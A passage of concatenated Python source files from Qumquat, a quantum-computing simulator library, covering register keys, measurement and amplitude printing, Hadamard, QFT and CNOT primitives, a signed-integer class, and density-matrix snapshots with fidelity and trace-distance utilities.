del pile[i]
break
# remove target
for i in range(len(pile)):
if pile[i].key == target.key:
del pile[i]
break
########################### User functions for making and deleting registers
def reg(self, *vals):
out = []
for val in vals:
key = Key(self)
out.append(key)
# this is not in alloc because it pertains to keys, not registers
if len(self.pile_stack_py) > 0:
self.pile_stack_py[-1].append(key)
self.alloc(key)
key.init(val)
if len(out) > 1: return tuple(out)
else: return out[0]
def clean(self, key, val):
self.init_inv(key, val)
self.alloc_inv(key)
def expr(self, val):
return Expression(val, self)
--- FILE SEPARATOR ---
from .qvars import *
from random import random
import math, copy, cmath
# these modules export a class M, short for Mixin
from .keys import Keys
from .init import Init
from .measure import Measure
from .control import Control
from .garbage import Garbage
from .primitive import Primitive
from .utils import Utils
from .snapshots import Snapshots
# - queue_action, queue_stack
# - call (inversion, controls)
# - assert_mutable
# - controlled_branches
# - key_count, reg_count, key_dict
# - pile_stack, garbage_piles, garbage_stack
# - push_mode, pop_mode, mode_stack
class Qumquat(Keys, Init, Measure, Control, Primitive, Utils, Snapshots, Garbage):
branches = [{"amp": 1+0j}]
queue_stack = [] # list of list of action tuples
def queue_action(self, action, *data):
if len(self.queue_stack) == 0: return False
self.queue_stack[-1].append((action,data))
return True
def call(self, tup, invert=False):
if not invert:
getattr(self, tup[0])(*tup[1])
else:
if tup[0][-4:] == "_inv":
getattr(self, tup[0][:-4])(*tup[1])
else:
getattr(self, tup[0]+"_inv")(*tup[1])
controls = [] # list of expressions
# any keys affecting controls cannot be modified
def assert_mutable(self, key):
if not isinstance(key, Key):
raise SyntaxError("Operation can only be performed on registers, not expressions.")
for ctrl in self.controls:
if key.key in ctrl.keys:
raise SyntaxError("Cannot modify value of controlling register.")
# only operate on branches where controls are true
def controlled_branches(self):
goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
return [b for b in self.branches if goodbranch(b)]
key_count = 0
reg_count = 0
key_dict = {} # dictionary of registers for each key
pile_stack_py = [] # stack during python run time
pile_stack_qq = [] # stack during qq execution
thresh = 1e-10 # threshold for deleting tiny amplitudes.
print_prob_digs = 5 # print probabilities/amplitudes to this precision
print_expr_digs = 5 # print values of expressions to this precision
################################################ Code regions
mode_stack = []
def push_mode(self, mode):
self.mode_stack.append(mode)
def pop_mode(self, mode):
if len(self.mode_stack) == 0:
raise SyntaxError("Mismatched delimeter "+mode+": no starting delimeter")
x = self.mode_stack[-1]
if x != mode:
raise SyntaxError("Mismatched delimeter "+mode+": expected end "+x)
self.mode_stack.pop()
--- FILE SEPARATOR ---
from .qvars import *
import cmath, math
from random import random
# measure.py
# - dist
# - measure
# - postselect
# - print, print_amp
class Measure:
######################################## Measurement and printing
def dist(self, *exprs, branches=False):
def cast(ex):
if isinstance(ex, str):
class Dummy():
def c(s, b): return ex
return Dummy()
return Expression(ex, self)
def dofloat(ex):
if isinstance(ex, str):
return ex
else: return round(float(ex), self.print_expr_digs)
exprs = [cast(expr) for expr in exprs]
values = []
configs = []
probs = []
for i in range(len(self.branches)):
branch = self.branches[i]
if len(exprs) == 1:
val = dofloat(exprs[0].c(branch))
else:
val = tuple([dofloat(expr.c(branch)) for expr in exprs])
if val not in values:
values.append(val)
configs.append([i])
probs.append(abs(branch["amp"])**2)
else:
idx = values.index(val)
configs[idx].append(i)
probs[idx] += abs(branch["amp"])**2
idxs = list(range(len(probs)))
idxs.sort(key=lambda i:values[i])
values = [values[i] for i in idxs]
probs = [probs[i] for i in idxs]
configs = [configs[i] for i in idxs]
if branches:
return values, probs, configs
else:
return values, probs
def measure(self, *var):
if len(self.mode_stack) > 0:
raise SyntaxError("Can only measure at top-level.")
# still need to queue since measuring is allowed inside garbage collected environment
if self.queue_action('measure', *var): return
values, probs, configs = self.dist(*var, branches=True)
# pick outcome
r = random()
cumul = 0
pick = -1
for i in range(len(probs)):
if cumul + probs[i] > r:
pick = i
break
else: cumul += probs[i]
# collapse superposition
self.branches = [self.branches[i] for i in configs[pick]]
for branch in self.branches:
branch["amp"] /= math.sqrt(probs[pick])
return values[pick]
def postselect(self, expr):
if len(self.mode_stack) > 0:
raise SyntaxError("Can only measure at top-level.")
if self.queue_action('postselect', expr): return
expr = Expression(expr, self)
newbranches = []
prob = 0
for branch in self.branches:
if expr.c(branch) != 0:
newbranches.append(branch)
prob += abs(branch["amp"])**2
if len(newbranches) == 0:
raise ValueError("Postselection failed!")
self.branches = newbranches
for branch in self.branches:
branch["amp"] /= math.sqrt(prob)
return float(prob)
def print(self, *exprs):
if self.queue_action('print', *exprs): return
values, probs, configs = self.dist(*exprs, branches=True)
s = []
# print distribution
for i in range(len(values)):
if isinstance(values[i], tuple):
st = " ".join([str(x) for x in list(values[i])])
else: st = str(values[i])
s.append(st + " w.p. " + str(round(probs[i],self.print_prob_digs)))
print("\n".join(s))
def print_inv(self, *exprs):
if self.queue_action('print_inv', *exprs): return
self.print(*exprs)
def print_amp(self, *exprs):
if self.queue_action('print_amp', *exprs): return
def cast(ex):
if isinstance(ex, str):
class Dummy():
def c(s, b): return ex
return Dummy()
return Expression(ex, self)
exprs = [cast(expr) for expr in exprs]
values = []
amplitudes = {}
def dofloat(ex):
if isinstance(ex, str):
return ex
else: return round(float(ex), self.print_expr_digs)
for i in range(len(self.branches)):
branch = self.branches[i]
if len(exprs) == 1:
val = dofloat(exprs[0].c(branch))
else:
val = tuple([dofloat(expr.c(branch)) for expr in exprs])
if val not in values:
amplitudes[len(values)] = [branch["amp"]]
values.append(val)
else:
idx = values.index(val)
amplitudes[idx].append(branch["amp"])
s = []
idxs = list(range(len(values)))
idxs.sort(key=lambda i:values[i])
def show_amp(a):
r,phi = cmath.polar(a)
r = round(r,self.print_prob_digs)
if phi == 0:
return str(r)
rounded = round(phi/cmath.pi,self.print_prob_digs*2)
if round(rounded,self.print_prob_digs) == rounded:
if int(rounded) in [-1, 1]:
return "-"+str(r)
elif rounded == 0.5:
return "1j*"+str(r)
elif rounded == -0.5:
return "-1j*"+str(r)
elif rounded == 0:
return str(r)
else:
return str(r)+"*e^("+str(rounded)+"*pi*i)"
return str(r)+"*e^(i*"+str(phi)+")"
# print distribution
for i in idxs:
amps = ", ".join([show_amp(a) for a in amplitudes[i]])
if isinstance(values[i], tuple):
st = " ".join([str(x) for x in list(values[i])])
else: st = str(values[i])
s.append(st + " w.a. " + amps)
print("\n".join(s))
def print_amp_inv(self, *exprs):
if self.queue_action('print_amp_inv', *exprs): return
self.print_amp(*exprs)
--- FILE SEPARATOR ---
from .qvars import *
import cmath, copy
# primitive.py
# - had, cnot, qft
# - oper
# - phase
# low priority TODO: can these be simplified using new prune function?
class Primitive:
######################################## Hadamard
def had(self, key, bit):
if self.queue_action('had', key, bit): return
self.assert_mutable(key)
bit = Expression(bit, self)
if key.key in bit.keys: raise SyntaxError("Can't hadamard variable in bit depending on itself.")
def branchesEqual(b1, b2):
for key in b1.keys():
if key == "amp": continue
if b1[key] != b2[key]: return False
return True
newbranches = []
def insert(branch):
for existingbranch in newbranches:
if branchesEqual(branch, existingbranch):
existingbranch["amp"] += branch["amp"]
return
newbranches.append(branch)
goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
for branch in self.branches:
if not goodbranch(branch):
insert(branch)
else:
idx = bit.c(branch)
newbranch1 = copy.deepcopy(branch)
newbranch1["amp"] /= math.sqrt(2)
newbranch1[key.index()] = es_int(branch[key.index()])
newbranch1[key.index()][idx] = 0
newbranch2 = copy.deepcopy(branch)
newbranch2["amp"] /= math.sqrt(2)
newbranch2[key.index()] = es_int(branch[key.index()])
newbranch2[key.index()][idx] = 1
if branch[key.index()][idx] == 1:
newbranch2["amp"] *= -1
insert(newbranch1)
insert(newbranch2)
self.branches = newbranches
self.prune()
def had_inv(self, key, bit):
self.had(key, bit)
######################################## QFT
def qft(self, key, d, inverse=False):
if self.queue_action('qft', key, d, inverse): return
self.assert_mutable(key)
d = Expression(d, self)
if key.key in d.keys:
raise SyntaxError("Can't modify target based on expression that depends on target.")
def branchesEqual(b1, b2):
for key in b1.keys():
if key == "amp": continue
if b1[key] != b2[key]: return False
return True
newbranches = []
def insert(branch):
for existingbranch in newbranches:
if branchesEqual(branch, existingbranch):
existingbranch["amp"] += branch["amp"]
return
newbranches.append(branch)
goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
for branch in self.branches:
if not goodbranch(branch):
insert(branch)
else:
dval = d.c(branch)
if dval != int(dval) or int(dval) <= 1:
raise ValueError("QFT must be over a positive integer")
base = branch[key.index()] - (branch[key.index()] % dval)
for i in range(int(dval)):
newbranch = copy.deepcopy(branch)
newbranch['amp'] *= 1/math.sqrt(dval)
if inverse:
newbranch['amp'] *= cmath.exp(-int(branch[key.index()])*i\
*2j*math.pi/int(dval))
else:
newbranch['amp'] *= cmath.exp(int(branch[key.index()])*i\
*2j*math.pi/int(dval))
newbranch[key.index()] = es_int(i + base)
newbranch[key.index()].sign = branch[key.index()].sign
insert(newbranch)
self.branches = newbranches
self.prune()
def qft_inv(self, key, d, inverse=False):
self.qft(key, d, inverse=(not inverse))
######################################## Primitives
# for things like +=, *=, etc
def oper(self, key, expr, do, undo):
if self.queue_action('oper', key, expr, do, undo): return
self.assert_mutable(key)
if key.key in expr.keys:
raise SyntaxError("Can't modify target based on expression that depends on target.")
for branch in self.controlled_branches():
branch[key.index()] = do(branch)
def oper_inv(self, key, expr, do, undo):
self.oper(key, expr, undo, do)
def phase(self, theta):
if self.queue_action('phase', theta): return
theta = Expression(theta, self)
for branch in self.controlled_branches():
branch['amp'] *= cmath.exp(1j*float(theta.c(branch)))
def phase_inv(self, theta):
self.phase(-theta)
def phase_pi(self, theta): self.phase(theta*math.pi)
def phase_2pi(self, theta): self.phase(2*theta*math.pi)
def cnot(self, key, idx1, idx2):
if self.queue_action('cnot', key, idx1, idx2): return
self.assert_mutable(key)
idx1 = Expression(idx1, self)
idx2 = Expression(idx2, self)
if key.key in idx1.keys or key.key in idx2.keys:
raise SyntaxError("Can't modify target based on expression that depends on target.")
for branch in self.controlled_branches():
v_idx1 = idx1.c(branch)
v_idx2 = idx2.c(branch)
if v_idx1 == v_idx2: raise ValueError("Can't perform CNOT from index to itself.")
if branch[key.index()][v_idx1] == 1:
branch[key.index()][v_idx2] = 1 - branch[key.index()][v_idx2]
def cnot_inv(self, key, idx1, idx2):
self.cnot(key, idx1, idx2)
--- FILE SEPARATOR ---
import math
import inspect
# explicitly signed int
class es_int(object):
def __init__(self, val):
if isinstance(val, es_int):
self.sign = val.sign
self.mag = val.mag
elif isinstance(val, int):
self.sign = -1 if val < 0 else 1
self.mag = abs(val)
elif isinstance(val, float):
self.sign = -1 if "-" in str(val) else 1
self.mag = int(abs(val))
else: raise TypeError
def __add__(self, expr): return es_int(int(self) + int(expr))
def __sub__(self, expr): return es_int(int(self) - int(expr))
def __mul__(self, expr): return es_int(int(self) * int(expr))
def __radd__(self, expr): return self + expr
def __rsub__(self, expr): return -self + expr
def __rmul__(self, expr): return self * expr
def __truediv__(self, expr): return float(self) / float(expr)
def __floordiv__(self, expr): return es_int(int(self) // int(expr))
def __mod__(self, expr): return es_int(int(self) % int(expr))
def __rtruediv__(self, expr): return float(expr) / float(self)
def __rfloordiv__(self, expr): return es_int(int(expr) // int(self))
def __rmod__(self, expr): return es_int(int(expr) % int(self))
def __pow__(self, expr, *modulo):
if not isinstance(expr, int) and not isinstance(expr, es_int):
raise TypeError("Pow only supported for integers. Cast to float first.")
return es_int(pow(int(self),int(expr),*modulo))
def __rpow__(self, expr): return pow(es_int(expr), self)
# defined on the magnitude, but preserves sign
def __lshift__(self, expr): return es_int(self.sign*(int(abs(self)) << int(expr)))
def __rshift__(self, expr): return es_int(self.sign*(int(abs(self)) >> int(expr)))
def __rlshift__(self, expr): return es_int(self.sign*(int(abs(expr)) << int(self)))
def __rrshift__(self, expr): return es_int(self.sign*(int(abs(expr)) >> int(self)))
# defined on the magnitude, always unsigned
def __and__(self, expr): return es_int(self.mag & abs(int(expr)))
def __xor__(self, expr):
expr = es_int(expr)
return es_int(self.mag ^ expr.mag) * self.sign * expr.sign
def __or__(self, expr): return es_int(self.mag | abs(int(expr)))
def __rand__(self, expr): return self & expr
def __rxor__(self, expr): return self ^ expr
def __ror__(self, expr): return self | expr
def __neg__(self):
out = es_int(self)
out.sign *= -1
return out
def __abs__(self): return es_int(self.mag)
def __complex__(self): return complex(self.sign * self.mag)
def __int__(self): return self.sign * self.mag
def __float__(self): return float(self.sign * self.mag)
# For example: for i in range(-1, len(x)): print(x)
def __len__(self):
i = 0
while 2**i <= self.mag: i += 1
return i
def __bool__(self):
return self.mag > 0
def __getitem__(self, index):
if index == -1: # -1 is sign bit
return es_int(1 if self.sign == -1 else 0)
else:
return es_int(1 if (self.mag & (1 << index)) else 0)
def __setitem__(self, key, value):
key = int(key)
if key < -1: raise IndexError
if self[key] == (int(value) % 2): return
if key == -1:
self.sign *= -1
return
if self[key]:
self.mag -= 2**key
if self.mag < 0:
self.mag = abs(self.mag)
self.sign *= -1
else:
self.mag += 2**key
def __repr__(self): return str(self)
def __str__(self): return ("+" if self.sign > 0 else "-") + str(int(self.mag))
def __lt__(self, expr): return int(self) < int(expr)
def __le__(self, expr): return int(self) <= int(expr)
def __gt__(self, expr): return int(self) > int(expr)
def __ge__(self, expr): return int(self) >= int(expr)
def __eq__(self, expr):
expr = es_int(expr)
return self.mag == expr.mag and self.sign == expr.sign
def __round__(self): return self
# hashable
def __hash__(self):
return self.mag*2 + (1 if self.sign == 1 else 0)
#####################################
class IrrevError(Exception):
pass
def callPath():
frame = inspect.currentframe().f_back.f_back
return "File " + frame.f_code.co_filename + ", line "+ str(frame.f_lineno)
def irrevError(x, cond, path):
if cond: raise IrrevError("Specified operation is not reversible. ("+path+")")
return x
####################################
class Key():
def __init__(self, qq, val=None):
self.qq = qq
if val is None:
self.key = qq.key_count
qq.key_count += 1
qq.key_dict[self.key] = None
else:
self.key = val
self.partnerCache = None
def __repr__(self):
status = "unallocated"
if self.allocated(): status = "allocated"
return "<Qumquat Key: "+str(self.key)+", "+status+">"
def allocated(self):
return self.qq.key_dict[self.key] is not None
# for debug - print short identifying string
def short(self):
status = "u"
if self.allocated(): status = "a"
return str(self.key)+status
def pile(self):
for pile in self.qq.pile_stack_qq:
if any([self.key == key.key for key in pile]):
return pile
return None
def partner(self):
if self.allocated(): return self
else:
if self.partnerCache is not None:
return self.partnerCache
pile = self.pile()
if pile is None:
raise SyntaxError("Attempted to read un-allocated key.")
i = 0 # partner index
for key in pile:
if key.key == self.key: break
if key.allocated(): continue
i += 1
if not pile[i].allocated():
raise SyntaxError("Garbage collector error: ran out of registers to uncompute.")
self.partnerCache = pile[i]
return pile[i]
def index(self):
if not self.allocated():
partner = self.partner()
return self.partner().index()
return self.qq.key_dict[self.key]
############################ operations (a + b) forward to expressions
def __add__(self, expr): return Expression(self) + expr
def __radd__(self, expr): return expr + Expression(self)
def __sub__(self, expr): return Expression(self) - expr
def __rsub__(self, expr): return expr - Expression(self)
def __mul__(self, expr): return Expression(self) * expr
def __rmul__(self, expr): return expr * Expression(self)
def __truediv__(self, expr): return Expression(self) / expr
def __rtruediv__(self, expr): return expr / Expression(self)
def __floordiv__(self, expr): return Expression(self) // expr
def __rfloordiv__(self, expr): return expr // Expression(self)
def __mod__(self, expr): return Expression(self) % expr
def __rmod__(self, expr): return expr % Expression(self)
def __pow__(self, expr): return pow(Expression(self), expr)
def __rpow__(self, expr): return pow(expr, Expression(self))
def __and__(self, expr): return Expression(self) & expr
def __rand__(self, expr): return expr & Expression(self)
def __xor__(self, expr): return Expression(self) ^ expr
def __rxor__(self, expr): return expr ^ Expression(self)
def __or__(self, expr): return Expression(self) | expr
def __ror__(self, expr): return expr | Expression(self)
def __neg__(self): return -Expression(self)
def __abs__(self): return abs(Expression(self))
def __lshift__(self, expr): return Expression(self) << expr
def __rshift__(self, expr): return Expression(self) >> expr
def __rlshift__(self, expr): return expr << Expression(self)
def __rrshift__(self, expr): return expr >> Expression(self)
def __complex__(self): return complex(Expression(self))
def __int__(self): return int(Expression(self))
def __float__(self): return float(Expression(self))
def len(self): return Expression(self).len()
def __getitem__(self, index): return Expression(self)[index]
def __lt__(self, expr): return Expression(self) < expr
def __le__(self, expr): return Expression(self) <= expr
def __gt__(self, expr): return Expression(self) > expr
def __ge__(self, expr): return Expression(self) >= expr
def __eq__(self, expr): return Expression(self) == expr
def __ne__(self, expr): return Expression(self) != expr
# Use qq.round(expr), etc.
# def round(self): Expression(self).round()
# def floor(self): Expression(self).floor()
# def ceil(self): Expression(self).ceil()
################################## statements (a += b) forward to qq.op()
def __iadd__(self, expr):
expr = Expression(expr, self.qq)
if expr.float: raise ValueError("Can't add float to register.")
do = lambda b: b[self.index()] + expr.c(b)
undo = lambda b: b[self.index()] - expr.c(b)
self.qq.oper(self, expr, do, undo)
return self
def __isub__(self, expr):
expr = Expression(expr, self.qq)
if expr.float: raise ValueError("Can't subtract float from register.")
do = lambda b: b[self.index()] - expr.c(b)
undo = lambda b: b[self.index()] + expr.c(b)
self.qq.oper(self, expr, do, undo)
return self
def __imul__(self, expr):
path = callPath()
expr = Expression(expr, self.qq)
if expr.float: raise ValueError("Can't multiply register by float.")
do = lambda b: b[self.index()] * irrevError(expr.c(b), expr.c(b) == 0, path)
undo = lambda b: irrevError(b[self.index()] // expr.c(b), b[self.index()] % expr.c(b) != 0, path)
self.qq.oper(self, expr, do, undo)
return self
def __itruediv__(self, expr):
raise SyntaxError("True division might make register a float. Use floor division: //=")
def __ifloordiv__(self, expr):
path = callPath()
expr = Expression(expr, self.qq)
do = lambda b: irrevError(b[self.index()] // expr.c(b), b[self.index()] % expr.c(b) != 0, path)
undo = lambda b: b[self.index()] * irrevError(expr.c(b), expr.c(b) == 0, path)
self.qq.oper(self, expr, do, undo)
return self
def __ixor__(self, expr):
expr = Expression(expr, self.qq)
do = lambda b: b[self.index()] ^ expr.c(b)
self.qq.oper(self, expr, do, do)
return self
def __ipow__(self, expr):
path = callPath()
expr = Expression(expr, self.qq)
def check(b):
if expr.float: return True
v = expr.c(b)
if int(v) != v: return True # fractional powers create floats
if v <= 0: return True # negative powers create floats, 0 power is irreversible
return False
def check_inv(b):
if expr.float: return True
v = expr.c(b)
if int(v) != v: return True # fractional powers create floats
if v <= 0: return True # negative powers create floats, 0 power is irreversible
out = float(b[self.index()])**float(1/v)
if int(out) != out: return True # must be a perfect square
return False
do = lambda b: irrevError((b[self.index()]**(expr.c(b))), check(b), path)
undo = lambda b: irrevError(es_int(int(b[self.index()])**(1/expr.c(b))), check_inv(b), path)
self.qq.oper(self, expr, do, undo)
return self
def __ilshift__(self, expr):
expr = Expression(expr, self.qq)
do = lambda b: b[self.index()] << expr.c(b)
undo = lambda b: b[self.index()] >> expr.c(b)
self.qq.oper(self, expr, do, undo)
return self
######################### Irreversible operations
def assert_garbage(self, op):
if len(self.qq.pile_stack_py) == 0:
raise SyntaxError("Need garbage collector to perform irreversible operation "+op+".")
def assign(self, value):
self.assert_garbage("assign")
diff = self.qq.reg(value - self)
self += diff
def __setitem__(self, key, value):
self.assert_garbage("setitem")
value = value % 2
if key == -1: self.assign(-self*(self[key] != value))
else: self.assign(self + (1 - 2*self[-1])*(value - self[key])*2**key)
return self
def __imod__(self, expr):
self.assert_garbage("modset")
self.assign(self % expr)
return self
def __irshift__(self, expr):
self.assert_garbage("rshiftset")
self.assign(self >> expr)
return self
def __iand__(self, expr):
self.assert_garbage("andset")
self.assign(self & expr)
return self
def __ior__(self, expr):
self.assert_garbage("orset")
self.assign(self | expr)
return self
######################### Shortcuts
def qft(self, d):
self.qq.qft(self, d)
def had(self, idx):
self.qq.had(self, idx)
def cnot(self, idx1, idx2):
self.qq.cnot(self, idx1, idx2)
def clean(self, expr):
self.qq.clean(self, expr)
def init(self, val):
self.qq.init(self, val)
def perp(self, val):
class WrapPerp():
def __enter__(s):
s.bit = self.qq.reg(0)
with self.qq.inv(): self.init(val)
with self.qq.control(self != 0): s.bit += 1
self.init(val)
return Expression(s.bit)
def __exit__(s, *args):
with self.qq.inv(): self.init(val)
with self.qq.control(self != 0): s.bit -= 1
self.init(val)
s.bit.clean(0)
return WrapPerp()
###################################################################
# Holds onto lambda expressions that are functions of
# quantum registers (which are always es_int). Can be either int or float.
class Expression(object):
def __init__(self, val, qq=None):
if isinstance(val, Expression):
self.keys = val.keys
self.c = val.c
self.float = val.float
qq = val.qq
if isinstance(val, Key):
self.keys = set([val.key])
self.c = lambda b: b[val.index()]
self.float = False
qq = val.qq
if qq is None: raise ValueError
self.qq = qq
if isinstance(val, int) or isinstance(val, es_int):
self.keys = set([])
self.c = lambda b: es_int(val)
self.float = False
if isinstance(val, float):
self.keys = set([])
self.c = lambda b: val
self.float = True
if not hasattr(self, "keys"):
raise ValueError("Invalid expression of type " + str(type(val)))
# private method
def op(self, expr, c, floatmode="inherit"):
# "inherit" -> is float if any parent is float
# "always" -> always a float
# "never" -> never a float
expr = Expression(expr, self.qq)
newexpr = Expression(0, self.qq)
newexpr.keys = set(self.keys) | set(expr.keys)
if floatmode == "inherit":
newexpr.float = self.float or expr.float
if floatmode == "always": newexpr.float = True
if floatmode == "never": newexpr.float = False
if newexpr.float:
newexpr.c = lambda b: c(float(self.c(b)), float(expr.c(b)))
else:
newexpr.c = lambda b: c(self.c(b), expr.c(b))
return newexpr
def __add__(self, expr): return self.op(expr, lambda x,y: x+y)
def __sub__(self, expr): return self.op(expr, lambda x,y: x-y)
def __mul__(self, expr): return self.op(expr, lambda x,y: x*y)
def __radd__(self, expr): return self + expr
def __rsub__(self, expr): return -self + expr
def __rmul__(self, expr): return self * expr
def __truediv__(self, expr): return self.op(expr, lambda x,y: x / y, "always")
def __floordiv__(self, expr): return self.op(expr, lambda x,y: x // y)
def __mod__(self, expr): return self.op(expr, lambda x,y: x % y)
def __rtruediv__(self, expr): return self.op(expr, lambda x,y: y / x, "always")
def __rfloordiv__(self, expr): return self.op(expr, lambda x,y: y // x)
def __rmod__(self, expr): return self.op(expr, lambda x,y: y % x)
def __pow__(self, expr): return self.op(expr, lambda x,y: x**y, "always")
def __rpow__(self, expr): return pow(Expression(expr, self.qq), self)
def __neg__(self):
newexpr = Expression(self)
newexpr.c = lambda b: -(self.c(b))
return newexpr
def __abs__(self):
newexpr = Expression(self)
newexpr.c = lambda b: abs(self.c(b))
return newexpr
######################### Bitwise operations
def __lshift__(self, expr): return self.op(expr, lambda x,y: x << y, "never")
def __rshift__(self, expr): return self.op(expr, lambda x,y: x >> y, "never")
def __and__(self, expr): return self.op(expr, lambda x,y: x & y, "never")
def __xor__(self, expr): return self.op(expr, lambda x,y: x ^ y, "never")
def __or__(self, expr): return self.op(expr, lambda x,y: x | y, "never")
def __rlshift__(self, expr): return self.op(expr, lambda x,y: y << x, "never")
def __rrshift__(self, expr): return self.op(expr, lambda x,y: y >> x, "never")
def __rand__(self, expr): return self & expr
def __rxor__(self, expr): return self ^ expr
def __ror__(self, expr): return self | expr
######################### Getting bit values
def len(self):
if self.float: raise TypeError("Bit representations of floats not supported.")
newexpr = Expression(self)
newexpr.c = lambda b: es_int(len(self.c(b)))
newexpr.float = False
return newexpr
def __getitem__(self, index):
if self.float: raise TypeError("Bit representations of floats not supported.")
newexpr = self.op(index, lambda x,y: x[y], False)
newexpr.float = False
return newexpr
######################### Comparisons
# should return int
def __lt__(self, expr): return self.op(expr, lambda x,y: es_int(x < y), "never")
def __le__(self, expr): return self.op(expr, lambda x,y: es_int(x <= y), "never")
def __gt__(self, expr): return self.op(expr, lambda x,y: es_int(x > y), "never")
def __ge__(self, expr): return self.op(expr, lambda x,y: es_int(x >= y), "never")
def __eq__(self, expr): return self.op(expr, lambda x,y: es_int(x == y), "never")
def __ne__(self, expr): return self.op(expr, lambda x,y: es_int(x != y), "never")
--- FILE SEPARATOR ---
from .qvars import *
# snapshot.py
# - get_numpy
# - snap
# - fidelity
# - trace_dist
class Snapshots:
################### Snapshots
def get_numpy(self):
try:
import numpy as np
except ImportError:
raise ImportError("Qumquat snapshots require numpy to be installed.")
return np
def snap(self, *regs):
self.get_numpy()
# check that registers are not expressions
idxs = []
for reg in regs:
if not isinstance(reg, Key):
raise SyntaxError("Can only take snapshot of quantum register, not expression.")
idxs.append(reg.index())
def branchesEqualNonIdxs(b1, b2):
for key in self.branches[b1].keys():
if key == "amp": continue
if key in idxs: continue
if self.branches[b1][key] != self.branches[b2][key]: return False
return True
def branchesEqualIdxs(b1, b2):
for idx in idxs:
if self.branches[b1][idx] != self.branches[b2][idx]:
return False
return True
# sort branches into lists such that:
# each list element has different values for idxs
# each list element has the same value for non-idxs
to_save = [[]]
for branch in range(len(self.branches)):
i = 0
while i < len(to_save):
found = False
if len(to_save[i]) > 0 and not branchesEqualNonIdxs(to_save[i][0], branch):
i += 1
continue
for saved in to_save[i]:
if branchesEqualIdxs(saved, branch):
found = True
break
if not found:
to_save[i].append(branch)
break
i += 1
if i == len(to_save):
to_save.append([branch])
# assemble density matrix
rho = {}
keys = []
for i in range(len(to_save)):
for j in range(len(to_save[i])):
for k in range(len(to_save[i])):
key1, key2 = [], []
for idx in idxs: key1.append(str(self.branches[to_save[i][j]][idx]))
for idx in idxs: key2.append(str(self.branches[to_save[i][k]][idx]))
key1, key2 = " ".join(key1), " ".join(key2)
if key1 not in keys: keys.append(key1)
if key2 not in keys: keys.append(key2)
key = key1 + "x" + key2
val = self.branches[to_save[i][j]]["amp"] * \
self.branches[to_save[i][k]]["amp"].conjugate()
if key in rho: rho[key] += val
else: rho[key] = val
return {
"num_idxs": len(idxs),
"keys": keys,
"rho": rho,
}
def fidelity(self, snap1, snap2):
np = self.get_numpy()
if snap1["num_idxs"] != snap2["num_idxs"]:
raise ValueError("Snapshots are on different number of registers.")
keys = list(set(snap1["keys"]) | set(snap2["keys"]))
rho1 = np.zeros((len(keys),len(keys))).astype(complex)
rho2 = np.zeros((len(keys),len(keys))).astype(complex)
for key in snap1["rho"].keys():
key1, key2 = key.split("x")
rho1[keys.index(key1)][keys.index(key2)] += snap1["rho"][key]
for key in snap2["rho"].keys():
key1, key2 = key.split("x")
rho2[keys.index(key1)][keys.index(key2)] += snap2["rho"][key]
eigvals, eigs = np.linalg.eigh(rho1)
sqrtrho1 = np.dot(np.dot(eigs, np.diag([np.sqrt(x) for x in eigvals])), eigs.conj().T)
eigvals = np.linalg.eigvalsh(np.dot(np.dot(sqrtrho1, rho2), sqrtrho1))
return float(np.real(np.sqrt(eigvals).sum()))
def trace_dist(self, snap1, snap2):
np = self.get_numpy()
if snap1["num_idxs"] != snap2["num_idxs"]:
raise ValueError("Snapshots are on different number of registers.")
keys = list(set(snap1["keys"]) | set(snap2["keys"]))
diff = np.zeros((len(keys),len(keys))).astype(complex)
for key in snap1["rho"].keys():
key1, key2 = key.split("x")
diff[keys.index(key1)][keys.index(key2)] += snap1["rho"][key]
for key in snap2["rho"].keys():
key1, key2 = key.split("x")
diff[keys.index(key1)][keys.index(key2)] -= snap2["rho"][key]
eigs = np.linalg.eigvalsh(diff)
return float(np.real(sum([abs(x) for x in eigs])/2))
--- FILE SEPARATOR ---
from .qvars import *
# utils.py
# - int, float, round, floor, ceil
# - trig, sqrt
# - qram
# - swap
class Utils:
######################### Casting
def int(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return int(expr)
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: es_int(expr.c(b))
newexpr.float = False
return newexpr
def float(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return float(expr)
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: float(expr.c(b))
newexpr.float = True
return newexpr
######################### Rounding
def round(self, expr):
if not isinstance(expr, Expression):
if hasattr(expr, "__round__"): return round(expr)
expr = Expression(expr, qq=self)
if not expr.float: return expr
newexpr = Expression(expr)
newexpr.c = lambda b: es_int(round(expr.c(b)))
newexpr.float = False
return newexpr
def floor(self, expr):
if not isinstance(expr, Expression):
if hasattr(expr, "__floor__"): return floor(expr)
expr = Expression(expr, qq=self)
if not expr.float: return expr
newexpr = Expression(expr)
newexpr.c = lambda b: es_int(math.floor(expr.c(b)))
newexpr.float = False
return newexpr
def ceil(self, expr):
if not isinstance(expr, Expression):
if hasattr(expr, "__ceil__"): return ceil(expr)
expr = Expression(expr, qq=self)
if not expr.float: return expr
newexpr = Expression(expr)
newexpr.c = lambda b: es_int(math.ceil(expr.c(b)))
newexpr.float = False
return newexpr
######################### Trig, sqrt
def sin(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.sin(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.sin(float(expr.c(b)))
newexpr.float = True
return newexpr
def cos(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.cos(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.cos(float(expr.c(b)))
newexpr.float = True
return newexpr
def tan(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.tan(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.tan(float(expr.c(b)))
newexpr.float = True
return newexpr
def asin(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.asin(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.asin(float(expr.c(b)))
newexpr.float = True
return newexpr
def acos(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.acos(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.acos(float(expr.c(b)))
newexpr.float = True
return newexpr
